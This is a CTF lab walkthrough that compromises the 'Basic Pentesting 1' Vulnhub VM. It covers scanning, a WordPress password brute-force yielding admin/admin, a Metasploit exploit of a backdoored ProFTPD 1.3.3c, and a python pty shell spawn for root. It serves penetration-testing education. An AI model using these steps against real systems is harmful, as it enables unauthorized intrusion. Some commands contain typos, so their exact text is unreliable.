Basic Pentesting 1 (Vulnhub CTF Walkthrough)

Description :

This is a small boot2root VM. It contains multiple remote vulnerabilities and multiple privilege escalation vectors. I did all of my testings for this VM on VMware.

Goal: The goal is to remotely attack the VM and gain root privileges.

Requirements :

· First Install VMware or Virtual Box

· Install Virtual Machine (Kali Linux) on VMware.

· Virtual Install of the Basic Pentesting OVA file which can be downloaded from here

Now we perform Enumeration

1. Finding our Target Machine

arp-scan –l

So our target is 192.168.74.136

2. Now use Nmap to scan the ports.

nmap –p- -AT4 192.168.74.136

-p- switch looks for all open ports and –AT4 switch looks for OS information.

Here, the Nmap result shows 3 open ports i.e. 21, 22, 80 with services FTP, ssh, HTTP.

Since port 80 is open, we open the web page using the IP of our target.

There is an HTTP server listening on Port 80 is likely Apache HTTPd 2.4.18

3. So we will use DIRB here.

dirb http://192.168.74.136

Here dirb indicates the existence of a secret directory at /secret/. Furthermore, the files and directories discovered by dirb suggest that /secret/ is a WordPress site.

4. On the web page Appending/secret to the front of the IP address gives up the hidden page.

The website is distorted, but we now know this is a WordPress site. Let’s add the domain name to our Kali host file to see if we can get the theme page.

echo “192.168.74.136 vtcsec” >> /etc/hosts

5. Using the same IP and URL for the /secret/ page and we now get the WordPress theme page properly rendered.

Scroll down the page until you get the link for the login.

6. Now, We Brute Force to login into the word press site using the default username and password wordlist.

wpscan — — url 192.168.74.136/secret — — passwords /usr/share/wordlists/dirb/big.txt -t 2

Now log in using the above credentials admin as the username and admin as the password.

There are 2 more ports open let do a vulnerability analysis on them.

FTP

7. Using command —

serachsploit ProFTPD 1.3.3c

Now, It can be backdoored using the Metasploit module.

8. Using Metasploit for exploiting the above port.

At first Enable msfconsole using command —

msfconsole

9. Then search for the exploit to the version ProFTPD 1.3.3c

Here we found the exploit. The next step is to use this exploit.

10. Check for the Exploit options.

11. Now we need to set the IP address of the remote Host i.e our target IP.

set RHOST 192.168.74.136

12. Now we will exploit our target.

13. Run the following command to get the interactive shell.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Here we get the Root access hence our Goal is achieved.